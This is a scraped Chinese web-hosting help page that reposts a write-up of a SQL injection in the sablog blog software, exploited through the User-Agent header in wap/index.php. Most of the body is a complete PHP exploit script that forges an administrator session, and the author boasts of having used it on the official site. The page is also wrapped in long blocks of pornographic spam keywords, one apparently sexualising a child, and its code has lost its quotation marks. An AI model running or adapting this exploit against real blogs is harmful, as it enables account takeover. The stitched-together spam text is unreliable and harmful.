a毛片毛费观看-a毛片在线-a毛片在线观看-a毛片在线免费观看-国产成人综合洲欧美在线-国产成人综合高清在线观看

始創于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業
  • 60秒人工響應
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補償
您的位置: 網站首頁 > 幫助中心>文章內容

php5 特性漏洞

發布時間:  2012/5/21 19:18:49

利用是PHP5,是因為_SERVER的變量不受引號的限制,即便是開啟了轉義
漏洞出在User-Agent
第二:insert into的多個數據插入
文中構造的地方就是
insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ($hash, ".$user[userid].", ".$user[groupid].", $iprand,,1),(9c5b71e5,1,1,211.43.206.202,9989581653, $timestamp);
MYSQL支持
insert into [admin] (name,pass) values (qq,bb),(aa,cc)
這樣的數據插入.
sablog是國內安全研究人員寫的一款blog程序,但是代碼中有一點瑕疵導致可能被獲取管理員權限:)
問題出在wap/index.php里的652行左右
------------
      $hash = getuserhash($user[userid], $user[username], $user[password], $user[logincount]+1);
      $DB->query("delete FROM {$db_prefix}sessions where uid=".$user[userid]." OR lastactivity+3600<$timestamp OR hash=$hash");
      $DB->query("insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ($hash, ".$user[userid].", ".$user[groupid].", $onlineip, ".$_SERVER[HTTP_USER_AGENT].", $timestamp)");
-------------
注意_SERVER變量是直接入庫的,存在一個insert類型的注射,我們通過這個漏洞測試過了官方,順利拿到了所有權限,呵呵.
這個地方要求是php5的,作者一時疏忽吧,貼出我們當時使用的exp
<?php
//from loveshell.net
$url = $argv[1]./wap/index.php;
$username = $argv[2];
$password = $argv[3];

echo"  +----------------------------------------------------------------+\r\n";
echo"      Uage: php.exe blogurl username password\r\n";
echo"      example  php.exe http://web.archive.org/web/20071217143209/http://www.loveshell.net/blog test test\r\n";
echo"  +----------------------------------------------------------------+\r\n";

if(!$username||!$password) die;
echo"  [email=root@localhost:Post]root@localhost:Post[/email] our content\r\n";
$str = username=.$username.&password=.$password.&action=login&do=login&;
$msg = myrequest($str,$url);
echo $msg;
if(strpos($msg,登陸成功)!==false) echo"  [email=root@localhost:All]root@localhost:All[/email] Done!!! \r\n";
else echo"  [email=root@localhost:Login]root@localhost:Login[/email] error!!! \r\n";
echo"  +----------------------------------------------------------------+\r\n";
echo"  Enjoy yourself.\r\n";
echo"  +----------------------------------------------------------------+\r\n";

function myrequest($msg,$url,$type=2,$cookie=){
//change type for post/get
  global $sql;
$urls = initurl($url);
$iprand = rand(1,255)...rand(1,255)...rand(1,255)...rand(1,255);
$fp = @fsockopen($urls[host], $urls[port], $errno, $errstr, 3);
  if($fp) {
    if($type==1){
      fputs($fp, "GET $urls[path]?$urls[query] HTTP/1.1\r\n");
      fputs($fp, "Host: $urls[host]\r\n");
      fputs($fp, "Accept: */*\r\n");
      fputs($fp, "Referer: $urls[url]\r\n");
      fputs($fp, "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)\r\n");
      fputs($fp, "CLIENT_IP: $iprand\r\n");
      fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");
      fputs($fp, "Pragma: no-cache\r\n");
      fputs($fp, "Cache-Control: no-cache\r\n");
      fputs($fp, "Connection: Keep-Alive\r\n");
      fputs($fp, "Cookie: $cookie\r\n\r\n");
    }else{
      fputs($fp, "POST $urls[path]?$urls[query] HTTP/1.1\r\n");
      fputs($fp, "Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n");
      fputs($fp, "Referer: $urls[url]\r\n");
      fputs($fp, "Accept-Language: zh-cn\r\n");
      fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");
//      fputs($fp, "User-Agent: ,1),((select concat(0x2f,groupid,0x2f,logincount) from angel_users limit 1),1,1,211.43.206.208,123\r\n");
      fputs($fp, "User-Agent: ,1),(9c5b71e5,1,1,211.43.206.202,9989581653\r\n");
      fputs($fp, "CLIENT_IP: $iprand\r\n");
      fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");
      fputs($fp, "Host: $urls[host]\r\n");
      fputs($fp, "Content-Length: ".strlen($msg)."\r\n");
      fputs($fp, "Connection: Keep-Alive\r\n");
      fputs($fp, "Cache-Control: no-cache\r\n");
      fputs($fp, "Cookie: $cookie\r\n\r\n");
      fputs($fp, $msg."\r\n");
    }
  }

while($fp&&!feof($fp)) {
$resp .= fread($fp,1024);
}
return $resp;
}

function initurl($url) {
$newurl = ;
$blanks = array(url=>);
$urls = $blanks;

if(strlen($url)<10) return $blanks;
$urls = @parse_url($url);
if(empty($urls) || !is_array($urls)) return $blanks;
if(empty($urls[scheme])) return $blanks;
if($urls[scheme] == file) return $blanks;
$newurl .= $urls[scheme].://;
$newurl .= empty($urls[user])?:$urls[user];
$newurl .= empty($urls[pass])?::.$urls[pass];
$newurl .= empty($urls[host])?:((!empty($urls[user]) || !empty($urls[pass]))?@:).$urls[host];
$newurl .= empty($urls[port])?::.$urls[port];
$newurl .= empty($urls[path])?:$urls[path];
$newurl .= empty($urls[query])?:?.$urls[query];
$newurl .= empty($urls[fragment])?:#.$urls[fragment];
$urls[port] = empty($urls[port])?80:$urls[port];
$urls[url] = $newurl;

return $urls;
}
?>


這次還是比較有意思的,起碼有以前沒有出現過的知識點在3個以上,另外sablog的加密認證方式很薄弱,加上這個注射可以進后臺的,作者需要改下哦.怕出問題的用戶把wap禁用吧,exp的含義我就不分析了,仔細分析的話會有很有意思的東西哦.....

億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
   聯系:億恩小凡
   QQ:89317007
   電話:0371-63322206


本文出自:億恩科技【www.ibaoshan.net】

服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線

     
     
    国精无码欧精品亚洲一区| 亚洲AV成人片乱码色午夜| 黑人巨大跨种族VIDEO| AV天堂久久天堂AV色综合| 性少妇JEALOUSVUE成熟| 男人添女人下部高潮全视频| 国产热の有码热の无码视频| 婷婷人人爽人人爽人人片| 久久久亚洲欧洲日产国码是AV| 一女三黑人玩4P惨叫| 色欲狠狠躁天天躁无码中文字幕| 国产真实乱对白精彩久久| 99RE6热视频这里只精品首页| 少妇太爽丰满一区二区| 久久老子午夜精品无码| 国产A级三级三级三级| 曰韩一区二区三区视频| 天天曰天天躁天天摸孕妇| 美女内射在线观看| 国产日产欧美一区二区蜜桃| 99久久免费国产精品四虎| 性一交一乱一乱一视频| 欧美精品多人P群无码| 狠狠色综合TV久久久久久| Y11111少妇无码电影| 亚洲国产在一区二区三区| 日韩精品人妻系列无码专区免费| 国产艳妇AV在线出轨| YSL千人千色8610| 亚洲精品55夜色66夜色| 日韩少妇白浆无码系列| 老熟女露脸内射正在播放| 国产乱码精品一区二区三区四川人| 一边下奶一边吃面膜视频讲解图片| 欧美性猛交一区二区| 精品久久人人做人人爽综合| 大量潮喷潮喷极限高H| 张柏芝阿娇全套无删减1313| 性丰满ⅩXXOOOZZXXHD| 欧美亚洲一区二区三区| 精品一卡二卡≡卡四卡日产乱码| 锕锕锕锕锕锕好爽视频软件| 亚洲国产精品久久一线不卡| 日韩熟妇αv无码激情视频| 狂猛欧美激情性XXXX大豆行情| 第一次爱的人视频播放完整版 | 激情五月色综合国产精品| 办公室撕开奶罩吮奶在线观看 | 亚洲第一AV网站| 日本熟妇色XXXXX日本免费看| 韩漫漫画登录页面入口弹窗秋蝉张 | 国产精品无码AV片在线观看播放| 一二三四在线观看免费高清视频| 日本在线观看母与子| 久久夜色精品国产噜噜亚洲AV| 吃奶呻吟打开双腿做受视频| 中年人妻丰满AV无码久久不卡 | 女人为啥摸几下就让进了| 国产亚洲日韩欧美另类丝瓜APP| 野花韩国在线观看免费版5| 无码精品人妻一区二区三区AV| 乱码视频午夜在线观看| 国产在线乱码一区二区三区| 大波妺AV网站影院| 中文字幕日韩人妻| 亚洲狠狠婷婷综合久久蜜芽 | 国产目拍亚洲精品一区| А√天堂中文官网在线BT| 一女多男3根一起进去爽吗| 亚洲AV乱码久久精品密桃| 色五月激情中文字幕| 欧美成人精品手机在线| 久久精品熟女亚洲AV麻豆| 国产精品免费AⅤ片在线观看| 18禁爆乳无遮挡免费观看日本动| 无码人妻丰满热妇又大又粗| 秋霞电影院yy2933| 久久亚洲人成网站| 黑人巨大超大VIDEOSGRA| 国产成人亚洲精品无码最新| АⅤ资源中文在线天堂| 岳两腿之间白嫩的小缝| 亚洲爆乳AAA无码专区| 天天躁日日躁狠狠躁2018| 人妻无码一区二区三区| 免费无码AⅤ片在线观看| 精品一卡二卡≡卡四卡日产乱码| 大胆极品美軳人人体| 中文字幕亚洲欧美日韩在线不卡| 午夜亚洲AV永久无码精品| 日韩人妻无码精品久久| 女神被啪进深处娇喘在线观看| 黑森林精选AV导航| 国产成人精欧美精品视频| 被CAO的合不拢腿| 18禁黄网站禁片免费观看香港| 亚洲AV日韩AV高潮喷无码| 双腿白浆白丝护士高潮视频| 欧洲美熟女乱又伦免费视频| 免费播放片高清在线视频| 久久国产色AV免费观看| 好紧我太爽了视频免费国产| 国产精品YY9299在线观看| 穿着旗袍方便C英语老师| JEALOUSVUE成熟五十| 2019理论韩国理论中文| 一二三四免费观看视频中国| 亚洲旡码A∨一区二区三区| 小雪被老汉玩遍各种方式| 天堂中文在线最新版地址| 日韩欧美亚洲综合久久影院D3 | 国产免费无遮挡吸乳视频在线观看| 99久久婷婷国产一区二区| 一二三四电影在线观看视频播放免 | 人妻精品久久久久中文字幕一冢本 | 试看AAAA啪啪片120秒| 欧美又粗又大BBBB疯视频AV| 蜜桃国产乱码精品一区二区三区| 国产视频一区二区| 公侵犯人妻一区二区三区四区 | 少妇厨房愉情理伦片BD在线观看 | 秘书在办公室被躁BD在线观看| 国产日产欧产精品精品APP| 成人一区二区三区视频在线观看| 在线天堂资源WWW在线中文| 亚洲欧美中文日韩V在线观看不卡| 丝袜高潮流白浆潮喷在线播放| 你的棒棒可以桶桶我的下水道| 黑人玩弄漂亮少妇高潮大叫| 国产乱人伦精品一区二区在线观看 | 久久水蜜桃网国产欧美H版护士| 国产精品无码素人福利不卡| 丰满人妻妇伦又伦精品国产| 成av人片一区二区三区久久| 啊灬啊灬啊灬快灬高潮了| Chinese高潮老女人| 91人人妻人人做人人爱 | 国产亚洲AV片在线观看播放按摩| 成人Av无码一区二区三区| H漫无码动漫AV动漫在线播放| 野花高清完整版免费观看视频电视 | FREE性开放小少妇| 777ZYZ玖玖资源站最稳定网| 中文字幕AV无码一区电影DVD| 亚洲成熟丰满熟妇高潮XXXXX| 熟女俱乐部 五十路 六十路| 日本熟妇极品FREE| 欧美成人精品高清在线观看| 蜜桃成人无码区免费视频网站 | 妇女被深耕过后的变化| 波多野结衣迅雷下载| 巴西大屁股妓女BBW| x88AV在线观看ww| FREEHDⅩXXXXSEX| CHINA浴室洗澡VOYEUR| CHINESE熟女老女人HD,| JAGNEXSMAX在日本| JIZZ中国女人奶水多| PLAY在线视频| YY8男人的天堂| 爸爸10岁幼儿TREE小学生| 波多野结衣在线观看AV| 波多野结衣AV无码| 成人国产欧美大片一区| 吃花核心舌头在里面旋转| 肥老熟妇伦子伦456视频| 给丰满丁字裤少妇按摩到高潮 | 高潮奶水涨喷在线播放| 成人无码特黄特黄AV片在线| 低头看我是怎么C哭你的| 丰满少妇被猛烈进出69影院| 国产69精品久久久久观看软件| 被老外做的下身都肿了| YSL千人千色T9和T9的区别| 按摩男让我高潮做了3次正常吗| 95W乳液78WYW永久区域| AV 日韩 人妻 黑人 综合| EEUSS鲁片一区二区三区| XX娇小嫩XX中国XX| 波多野结衣AV在线| 东京热无码人妻精品一区二区三区| YES4444视频在线观看| 被黑人猛男强伦姧人妻完整版| 99无人区码一码二码三码...| 一区二三区在线 | 中国| 又粗又大内射免费视频小说| 中文精品一卡2卡3卡4卡| 综合一区无套内射中文字幕 | 无人区码一码二码三码医生系列 | 被黑人猛烈30分钟视频| 波多野结衣片全部电影| 大陆熟妇丰满多毛XXXX| 国产AV一区二区三区传媒| 国产精品无码无片在线观看 | 久久久久久精品毛片A级蜜桃| 狠狠色噜噜狠狠亚洲AV| 精品无码无人网站免费视频| 久久先锋男人AV资源网站| 免费A级毛片无码免费视频120| 久久久久亚州AⅤ无码专区首|